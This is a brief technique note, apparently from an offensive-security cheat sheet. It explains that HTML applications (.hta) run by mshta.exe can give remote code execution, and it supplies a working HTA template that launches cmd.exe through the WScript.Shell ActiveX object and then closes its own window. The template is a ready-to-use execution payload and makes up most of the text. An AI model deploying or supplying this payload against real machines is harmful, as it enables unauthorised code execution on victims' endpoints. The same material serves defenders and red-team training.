HTML application refers to HTML webpages with the suffix .hta that is supported by Internet Explorer (and Edge) through mshta.exe. An endpoint that runs untrusted HTAs can be used to gain remote code execution.

To run Windows commands in HTA:

<html>
    <head>
        <script>
          var c = 'cmd.exe'
          new ActiveXObject('WScript.Shell').Run(c);
        </script>
    </head>
    <body>
        <script>
          self.close(); // close the extra window (mshta.exe)
        </script>
    </body>
</html>